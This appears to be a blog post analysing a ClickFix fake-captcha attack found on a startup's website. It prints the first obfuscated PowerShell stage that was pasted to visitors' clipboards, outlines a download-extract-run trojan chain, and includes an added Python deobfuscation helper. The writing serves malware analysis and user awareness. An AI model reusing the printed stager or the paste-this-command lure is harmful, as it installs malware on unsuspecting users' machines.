Additional Verification Required


Aura of Mystique

As a child and teenager the concept of malware always had an aura of mystique for me. It was this thing that everyone was trying to avoid, while very few people actually understood it. As someone who got somewhat interested in coding in my mid teens, I knew roughly what it did and conceptually how it's done, but the actual functionality was always beyond my knowledge. Considering the amount of warning and talk about it, malware never really presented itself to me personally. It can of course be argued that this was exactly because I learned early on how one avoids it. To me it seemed like one of those things that feel like a huge problem as a child, like the canon event every child has when they realize the sun will eventually blow up, but turn out not to be such a big deal once you get older. While there are victims of cybercrime and I do not want to downplay that, I personally have never (at least knowingly) encountered malware in the wild. This changed last week, which is what I want to talk about today.

In the Beginning there was a Captcha

Now one might expect some wild story in which some obscure site in a suspect corner of the internet was to blame. Quite the contrary. Someone on a Discord server I frequent mentioned a weird captcha prompt on the website of a university startup. The following is what a user was prompted with after clicking the checkbox in the common Cloudflare captcha.

Captured ClickFix Prompt

Someone in the field of computer science is immediately going to be on high alert seeing this. But it should be said that this is a very real, and presumably effective, attack called ClickFix. I am aware that the attack chain I will explain is likely common and nothing special. This is mostly a description of the process we (two people on the Discord alongside me) went through investigating this suspicious captcha prompt. It is in no way an analysis of effectiveness or the like.

Please execute whatever is in your clipboard

While I am writing this I have not yet discovered what exactly hijacked the client's clipboard. Regardless, after we discussed it a bit we found that the injected clipboard content was adapted to the visitor's OS. From here on I will be referring to the Windows version, since that is what I ran at the time. So what is it they wanted you to paste into your terminal?

# XOR key for the first obfuscation layer
$nVMM='X2SKtE9uSZeHrEc';
# Base64-encoded, XOR-encrypted second stage
$tNLo=[convert]::FromBase64String('ERI3JFQrVgFzMQsnBWUUMFMnawAtXFU/OxJoHioMM0FzJx0uXFU1NRdoAjABNFsgIx0rXlUnMgw7Ui4KNlZzJBJlSgEmPANoASpDMVwgPxEkXVU7OxMtUjELMUFzIwAxSQZpdUoxHTAXLRwxLlsMTjkAKCs9QzUTEQ==');
$y3JM='';
# Decrypt byte by byte: each byte XORed with the cycling key, collected as a string
for($pdHBcbB=0;$pdHBcbB -lt $tNLo.Length;$pdHBcbB++){
    $y3JM+=[char]($tNLo[$pdHBcbB]-bxor[byte][char]$nVMM[$pdHBcbB%$nVMM.Length])
};
# Re-encode the decrypted script as Base64 of UTF-16LE (the -EncodedCommand format)
$GUBgdBMx=[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($y3JM));

This is quite obviously just a layer of obfuscation. To recover the actual code that runs, we decode the Base64 and XOR the bytes with the key in $nVMM. There is an almost identical layer behind that, and after deobfuscating that too we get the actual payload that was put into the clipboard in a readable format. A functional summary of it looks like this:

1. Fetch an unzipping utility from one of their domains
2. Fetch a zip archive; this is the malware
3. Extract the .exe from the archive with the key
4. Run the exe
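The two-layer peel described above, written out as an analyst's helper. This is an added example, not code from the original post: the names STAGE_RE, xor_b64_decode, to_encoded_command, peel_stage, peel_all, build_stage, FINAL_PAYLOAD and SAMPLE are mine, and the sample stages it peels are constructed with a benign placeholder rather than the blob from the page. It mirrors the PowerShell loop exactly (Base64-decode, XOR each byte with the cycling key, treat the result as characters) and keeps peeling while the output still has the shape of another stage, which is how the "almost identical layer behind that" is handled; it also shows that the last line of each stage produces the Base64-of-UTF-16LE form that powershell.exe accepts through -EncodedCommand.

```python
import base64
import re

# Matches the shape of a stage as seen above: a key assignment followed by a
# FromBase64String() call. The leading "$" is optional because the first line
# as pasted may have lost it; [convert] and [Convert] both occur.
STAGE_RE = re.compile(
    r"\$?(\w+)='([^']*)';\s*\$\w+=\[convert\]::FromBase64String\('([A-Za-z0-9+/=]+)'\)",
    re.IGNORECASE,
)


def xor_b64_decode(key: str, blob: str) -> str:
    """Undo one layer: Base64-decode, then XOR every byte with the cycling key.

    Same operation as [char]($bytes[$i] -bxor [byte][char]$key[$i % $key.Length]).
    """
    data = base64.b64decode(blob)
    kb = key.encode("latin-1")
    return "".join(chr(b ^ kb[i % len(kb)]) for i, b in enumerate(data))


def to_encoded_command(text: str) -> str:
    """What the last line of a stage builds: Base64 of the UTF-16LE text,
    which is the format powershell.exe accepts via -EncodedCommand."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def peel_stage(stage: str):
    """Return the plaintext hidden in one stage, or None if it is not in that shape."""
    m = STAGE_RE.search(stage)
    if m is None:
        return None
    return xor_b64_decode(m.group(2), m.group(3))


def peel_all(stage: str, max_layers: int = 8) -> list:
    """Peel until the text no longer looks like another stage.

    Returns every layer, outermost first; the last entry is the readable payload.
    """
    layers = [stage]
    while len(layers) <= max_layers:
        inner = peel_stage(layers[-1])
        if inner is None:
            break
        layers.append(inner)
    return layers


# --- Constructed sample (assumption: not the blob from the page) ---------------

def build_stage(key: str, inner: str) -> str:
    """Wrap `inner` in a stage of the same shape; used here only to build sample data."""
    kb = key.encode("latin-1")
    blob = base64.b64encode(
        bytes(ord(c) ^ kb[i % len(kb)] for i, c in enumerate(inner))
    ).decode("ascii")
    return (
        f"$k='{key}';\n"
        f"$d=[convert]::FromBase64String('{blob}');\n"
        "$s='';\n"
        "for($i=0;$i -lt $d.Length;$i++){ $s+=[char]($d[$i]-bxor[byte][char]$k[$i%$k.Length]) };\n"
        "$e=[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($s));\n"
    )


# Benign placeholder standing in for the readable final stage (constructed).
FINAL_PAYLOAD = "Write-Host 'constructed placeholder for the readable final stage'"
# Two nested stages, exactly the layering seen in the clipboard content.
SAMPLE = build_stage("X2SK", build_stage("tE9u", FINAL_PAYLOAD))

if __name__ == "__main__":
    for depth, layer in enumerate(peel_all(SAMPLE)):
        print(f"--- layer {depth} ---\n{layer}")
```

To use it on a real capture, pass the pasted stage text to peel_all and read the last layer; nothing in it executes the decoded script, it only prints it. The regex deliberately does not rely on the variable names, since those are randomized per sample.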

After booting up a VM, I fetched the zip and therefore the exe. At this point I have not managed to reverse engineer it myself. In case I do manage to in the future, I might add to this post or write a follow-up. After uploading the file to VirusTotal we had confirmation: this was a trojan. There I had it. After all these years, I had actually uncovered and archived a piece of malware in the real world, with the help of some friends.

This is only half the puzzle though. How did this end up on a website whose owners didn't know anything about it? My first guess is that some package they used was compromised. Since they mentioned they do not update often, that seems unlikely, as it would mean they served malware for a long time without anyone noticing, unless they build more often than they mentioned. Another option is that one of the devs got pwned and someone smuggled the malicious code into the GitHub repo that way. Unfortunately I think it is rather difficult, if not impossible, to find the exact cause without access to their private repo.

Worth mentioning: someone said that they had "slopped" the website. This aligned with what we saw in the Discord chat, as the owner of the site did join us to figure out what happened and kept pasting LLM responses into the chat.

Conclusions and what not to do I guess

The first thing I would mention is that seemingly "easy to detect" attacks are still very much around, which implies that people do fall for them. For anyone with some tech knowledge it might seem insane to blindly paste and execute something in the terminal, but for someone who isn't as knowledgeable on this topic it might seem like "the new thing" used to detect bots. We should try to teach people, especially those without a technical background, about these kinds of methods. While this is certainly no groundbreaking discovery, I still enjoyed digging through the exploit chain for an afternoon. How the code got onto the site is still unknown. The owner rebuilt the page and updated all packages, and it seems to no longer be an issue.

As a final note: I personally would not recommend having a website that is purely made by AI. I think it is essential that someone knows what is being used and is aware of the security risks.